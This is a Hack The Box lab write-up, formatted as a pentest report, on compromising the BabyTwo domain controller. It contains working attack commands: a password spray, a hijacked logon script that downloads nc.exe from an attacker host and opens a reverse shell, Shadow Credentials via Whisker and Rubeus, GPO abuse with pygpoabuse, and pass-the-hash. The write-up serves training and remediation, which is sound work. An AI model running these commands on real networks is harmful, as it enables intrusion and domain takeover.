2026-06-26 • htb • medium • windows

HTB - BabyTwo

Anonymous SMB access exposes a homes share that leaks the full domain user list and an apps/NETLOGON logon script. A lazy account-provisioning pattern (username == password) yields valid credentials for Carl.Moore. Although SYSVOL is read-only at the share level, a misconfigured DACL on login.vbs grants Everyone FULL control, allowing the logon script to be overwritten with a reverse shell that fires as Amelia.Griffiths (user flag). BloodHound shows Amelia, via the legacy group, holds WriteDacl/WriteOwner over the gpoadm account. PowerView grants full control, a Shadow Credentials attack with Whisker and Rubeus recovers gpoadm's NT hash, and because gpoadm controls domain GPOs, pygpoabuse schedules a task adding gpoadm to Domain Admins — completing full domain compromise.

smb-enumerationanonymous-accesspassword-sprayinglogon-scriptsysvol-aclshadow-credentialsgpo-abusebloodhoundpass-the-hashactive-directory nmapnxcsmbcaclssmbclientbloodhoundpowerviewwhiskerrubeuspygpoabuseevil-winrm

Hack The Box — BabyTwo

Medium | Windows | Hack The Box

Field	Value
Report Date	26 June 2026
Assessed By	RobInTheHood
Target IP	10.129.234.72
Hostname	DC
Domain	baby2.vl

Executive Summary
Scope
Methodology
Attack Chain Summary
Findings
Proof of Access
Credentials Discovered
Impact Assessment
Remediation Summary
Key Takeaways
Tools Used
Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine BabyTwo. The objective was to obtain domain-administrator-level access in an authorised lab environment and document the attack path with reproducible evidence.

No credentials are supplied. Anonymous (guest) SMB access exposes a homes share that discloses the full domain user list and an apps/NETLOGON share containing a logon script (login.vbs). A lazy account-provisioning pattern — where the password equals the username — yields valid credentials for Carl.Moore.

Although SYSVOL is read-only at the share level, the DACL on login.vbs grants Everyone FULL control. The logon script is overwritten with a reverse-shell dropper that executes the next time a user authenticates, landing a shell as Amelia.Griffiths and the user flag.

BloodHound reveals that Amelia, through the legacy group, holds WriteDacl / WriteOwner over the gpoadm account. PowerView is used to grant full control, after which a Shadow Credentials attack with Whisker and Rubeus recovers gpoadm’s NT hash. Because gpoadm administers domain-linked Group Policy Objects, pygpoabuse is used to schedule a task that adds gpoadm to Domain Admins, completing full domain compromise.

2. Scope

Field	Value
Target IP	10.129.234.72
Hostname	DC
Domain	baby2.vl
Operating System	Windows Server 2022 Build 20348
Machine Rating	Medium
Environment	Hack The Box — Authorised Training Lab
Assessment Date	26 June 2026
Assessor	RobInTheHood

3. Methodology

Reconnaissance — service discovery and external attack-surface mapping
Enumeration — anonymous share, user, and logon-script analysis
Exploitation — initial access through validated misconfiguration paths
Lateral Movement — privilege pivoting via logon-script hijack and ACL abuse
Privilege Escalation — full compromise to domain-administrator context
Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

Phase	Technique	MITRE ATT&CK
Recon	Nmap — DC port profile (53/88/389/445/636/3268/9389)	T1046
Enumeration	Anonymous SMB share listing → `homes` user list, `apps`/NETLOGON logon script	T1135
Credential Access	Password spraying — username == password (`Carl.Moore`)	T1110.001
Initial Access	Weak SYSVOL file DACL → logon-script (`login.vbs`) hijack → reverse shell as `Amelia.Griffiths`	T1037.001
Discovery	BloodHound ACL analysis — `legacy` group → WriteDacl/WriteOwner over `gpoadm`	T1087.002
Privilege Escalation	PowerView `Add-DomainObjectAcl` → GenericAll → Shadow Credentials → NT hash	T1222.001 · T1649
Privilege Escalation	GPO abuse — scheduled task adds `gpoadm` to Domain Admins	T1484.001
Post-Exploitation	Pass-the-hash over WinRM as `gpoadm` (Domain Admin)	T1550.002

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

A full TCP port scan returns the classic Windows domain controller profile:

nmap -p- -Pn --min-rate 1000 "$TARGET"

Port	Service
53/tcp	DNS
88/tcp	Kerberos
135/tcp	RPC
139/tcp	NetBIOS
389/tcp	LDAP
445/tcp	SMB
464/tcp	kpasswd
636/tcp	LDAPS
3268/3269	Global Catalog
3389/tcp	RDP
9389/tcp	ADWS

The combination of Kerberos, LDAP, SMB, and ADWS confirms a domain controller for baby2.vl. With no supplied credentials, enumeration begins against SMB using the guest / anonymous account.

Enumeration — Anonymous SMB Shares

nxc smb "$TARGET" -u 'guest' -p '' --shares

Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl) (signing:True) (Null Auth:True)
[+] baby2.vl\guest:
Share      Permissions   Remark
-----      -----------   ------
ADMIN$                   Remote Admin
apps       READ
C$                       Default share
docs
homes      READ,WRITE
IPC$       READ          Remote IPC
NETLOGON   READ          Logon server share
SYSVOL                   Logon server share

Two non-default shares stand out: apps and homes.

Enumeration — Building the User List from `homes`

Spidering the homes share reveals one folder per domain user:

nxc smb "$TARGET" -u 'guest' -p '' --spider homes --pattern .

Amelia.Griffiths   Carl.Moore       Harry.Shaw       Joan.Jennings
Joel.Hurst         Kieran.Mitchell  Lynda.Bailey     Mohammed.Harris
Nicola.Lamb        Ryan.Jenkins     library

This produces a clean username list to attack.

Enumeration — Logon Script in `apps` / NETLOGON

nxc smb "$TARGET" -u 'guest' -p '' --spider apps --regex . --only-files

//.../apps/dev/CHANGELOG          (size 108)
//.../apps/dev/login.vbs.lnk      (size 1800)

The .lnk shortcut points at login.vbs stored in NETLOGON (\\dc.baby2.vl\NETLOGON, i.e. SYSVOL\baby2.vl\scripts). The script is a standard domain logon script that maps network drives and runs automatically whenever a user logs on:

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

As guest we cannot write to it yet — but its automatic execution makes it a high-value target for later.

Credential Access — Password == Username

Brute-forcing the discovered users against rockyou produced nothing. The next hypothesis: an administrator who provisions accounts with username == password. Testing the user list against itself:

nxc smb "$TARGET" -u users.txt -p users.txt --ignore-pw-decoding

[+] baby2.vl\Carl.Moore:Carl.Moore

Valid credentials: Carl.Moore : Carl.Moore. Re-enumerating shares as Carl shows a much larger write surface:

apps    READ,WRITE
docs    READ,WRITE
homes   READ,WRITE

Initial Access — Logon Script Hijack

The decisive detail is not the share permission but the file-level DACL on the logon script. Even though SYSVOL is read-only at the share level, the ACL on login.vbs grants Everyone and Authenticated Users FULL control:

smbcacls "//$TARGET/SYSVOL" "baby2.vl/scripts/login.vbs" -U 'baby2.vl\Carl.Moore%Carl.Moore'

OWNER:BUILTIN\Administrators
ACL:Everyone:ALLOWED/0x0/FULL
ACL:NT AUTHORITY\Authenticated Users:ALLOWED/0x0/FULL
ACL:NT AUTHORITY\SYSTEM:ALLOWED/0x0/FULL
ACL:BUILTIN\Administrators:ALLOWED/0x0/FULL
ACL:BUILTIN\Server Operators:ALLOWED/0x0/READ

The logon script can therefore be overwritten. It is replaced with a VBS dropper / reverse shell, with two guard rails so it does not spawn endless shells while other users log in:

Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")

' Guard 1: download nc.exe only if not already present
If Not fso.FileExists("C:\Windows\Temp\nc.exe") Then
    shell.Run "cmd /c certutil -urlcache -split -f http://10.10.14.X:8000/nc.exe C:\Windows\Temp\nc.exe", 0, True
End If

' Guard 2: relaunch the shell ONLY if no nc.exe is already running
shell.Run "cmd /c tasklist /FI ""IMAGENAME eq nc.exe"" | find /I ""nc.exe"" || C:\Windows\Temp\nc.exe 10.10.14.X 4444 -e cmd.exe", 0, False

When a user next authenticates, the script fires and a shell is received:

C:\Windows\system32> whoami
baby2\amelia.griffiths

User Flag

C:\> type user.txt
42783b2c1483aeb70eca6810f0645c38

Discovery — BloodHound ACL Analysis

Amelia’s group memberships include BABY2\office and BABY2\legacy. BloodHound shows that the legacy group holds powerful outbound rights:

Amelia.Griffiths outbound rights in BloodHound

AMELIA.GRIFFITHS --MemberOf--> LEGACY
        LEGACY --WriteOwner / WriteDacl--> GPOADM
        LEGACY --WriteOwner / WriteDacl--> GPO-MANAGEMENT (OU)

So, via the legacy group, Amelia effectively has WriteOwner + WriteDacl over the gpoadm user.

Privilege Escalation — Self-Granting ACLs → Shadow Credentials

A direct password reset is denied — WriteDacl/WriteOwner is not the same as Reset Password:

Set-ADAccountPassword -Identity gpoadm -Reset -NewPassword $p
# Set-ADAccountPassword : Access is denied

A Shadow Credentials attempt with Whisker also fails initially, because we do not yet hold rights over msDS-KeyCredentialLink:

./Whisker.exe add /target:gpoadm
# [X] Could not update attribute: Access is denied.

Because we have WriteDacl over gpoadm, PowerView is used to add an ACE granting Amelia full control over the target, then the attack is repeated:

. .\PowerView.ps1   # dot-source to load functions silently
Add-DomainObjectAcl -TargetIdentity gpoadm -PrincipalIdentity Amelia.Griffiths -Rights All

Whisker can now write the key credential. A PFX is saved to disk (/path + /password), since the inline Base64 certificate exceeds the limited cmd/PowerShell line length:

./Whisker.exe add /target:gpoadm /path:C:\Users\Amelia.Griffiths\Desktop\cert.pfx /password:Password123!
# [+] Updated the msDS-KeyCredentialLink attribute of the target object

Rubeus requests a TGT and recovers credentials via U2U:

./Rubeus.exe asktgt /user:gpoadm /certificate:C:\Users\Amelia.Griffiths\Desktop\cert.pfx \
    /password:"Password123!" /domain:baby2.vl /dc:dc.baby2.vl /getcredentials /show

[+] TGT request successful!
  UserName : gpoadm
  NTLM     : 51B4E7AEE2FBDD4E36F2381115C8FE7A

Privilege Escalation — GPO Abuse → Domain Admin

The gpoadm account (member of GPO-Management) can edit domain-linked GPOs. The Default Domain Policy (6AC1786C-016F-11D2-945F-00C04FB984F9) is abused with pygpoabuse to schedule a task that adds gpoadm to Domain Admins:

pygpoabuse.py baby2.vl/gpoadm -hashes :51B4E7AEE2FBDD4E36F2381115C8FE7A \
    -gpo-id 6AC1786C-016F-11D2-945F-00C04FB984F9 \
    -command 'net group "Domain Admins" gpoadm /add /domain' -dc-ip $TARGET -f
# [+] ScheduledTask TASK_9cd980c5 created!

After the GPO refreshes, authenticate with the hash and confirm Domain Admin membership:

evil-winrm -u 'gpoadm' -H 51B4E7AEE2FBDD4E36F2381115C8FE7A -i $TARGET

*Evil-WinRM* PS> whoami /groups
BABY2\Domain Admins                 Group   S-1-5-21-...-512
BUILTIN\Administrators              Alias   S-1-5-32-544
Mandatory Label\High Mandatory Level

Root Flag

*Evil-WinRM* PS C:\Users\Administrator> type "C:\Users\Administrator\Desktop\root.txt"
293500962edc31fa154951eeeb5740f9

6. Proof of Access

Level	Evidence
User (`Amelia.Griffiths`)	`42783b2c1483aeb70eca6810f0645c38`
Root / Administrator (`gpoadm` → Domain Admins)	`293500962edc31fa154951eeeb5740f9`

7. Credentials Discovered

Account	Secret	Type	Source
`guest`	(blank)	Anonymous SMB	Null authentication
`Carl.Moore`	`Carl.Moore`	Domain password	Password == username spray
`Amelia.Griffiths`	(logon-script RCE)	Interactive shell	Logon-script hijack
`gpoadm`	`51B4E7AEE2FBDD4E36F2381115C8FE7A`	NT hash	Shadow Credentials (Whisker + Rubeus)

8. Impact Assessment

Successful exploitation resulted in complete domain compromise through a chain of misconfigurations rather than software vulnerabilities. Anonymous SMB access leaked the entire user roster, and a weak provisioning convention gave an authenticated foothold. The single most damaging finding is the over-permissive DACL on the SYSVOL logon script: any authenticated user could weaponise a script that executes in the security context of every user who logs on, providing reliable lateral movement. From there, a delegated ACL path (legacy group → gpoadm) combined with Shadow Credentials and GPO abuse delivered Domain Admin without ever cracking a password or launching a network exploit.

9. Remediation Summary

Priority	Action
Critical	Tighten the DACL on `login.vbs` and all SYSVOL/NETLOGON scripts — domain users must have read/execute only, never Write/Full Control. Audit `Everyone` and `Authenticated Users` ACEs across SYSVOL.
Critical	Never provision accounts with `username == password`; enforce a strong, unique password policy and reset all affected accounts (`Carl.Moore`).
High	Disable anonymous/guest SMB access and remove unnecessary read permissions on the `homes`, `apps`, and `docs` shares.
High	Review and remove dangerous delegated ACLs (`WriteDacl`/`WriteOwner`) held by the `legacy` group over `gpoadm` and the GPO-Management OU.
High	Restrict who can edit domain-linked GPOs; monitor for unexpected scheduled-task modifications introduced through GPO.
Medium	Monitor and alert on `msDS-KeyCredentialLink` changes to detect Shadow Credentials attacks.
Medium	Enable LDAP signing and channel binding to impede BloodHound-style ACL enumeration.

10. Key Takeaways

Share-level permissions and file-level ACLs are independent — a read-only share can still expose a fully writable, auto-executing file. Always inspect object DACLs with smbcacls, not just share permissions.
Logon scripts in SYSVOL execute for every user who authenticates; a writable logon script is effectively domain-wide code execution against any account that logs on.
Lazy provisioning patterns (username == password) remain a high-yield, low-effort initial-access vector — spray the user list against itself before reaching for rockyou.
WriteDacl/WriteOwner is not Reset Password. The correct play is to self-grant the rights you need (Add-DomainObjectAcl … -Rights All) and then perform Shadow Credentials — a deterministic, low-noise path to an NT hash.
Control over domain-linked GPOs is equivalent to control over every object the GPO applies to; pygpoabuse turns GPO write access into immediate Domain Admin via a scheduled task.

11. Tools Used

Tool	Purpose
`nmap`	Port and service discovery
`nxc` (NetExec)	Anonymous SMB enumeration, share spidering, password spraying
`smbcacls`	SYSVOL file DACL inspection
`smbclient`	SMB share browsing and file download
`BloodHound`	ACL and attack-path analysis in Active Directory
`PowerView`	Self-granting ACLs (`Add-DomainObjectAcl`)
`Whisker`	Shadow Credentials (`msDS-KeyCredentialLink`)
`Rubeus`	TGT request and credential recovery via U2U
`pygpoabuse`	GPO abuse — scheduled-task injection
`evil-winrm`	WinRM shell and pass-the-hash authentication

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.

End of Report — BabyTwo | RobInTheHood | 26 June 2026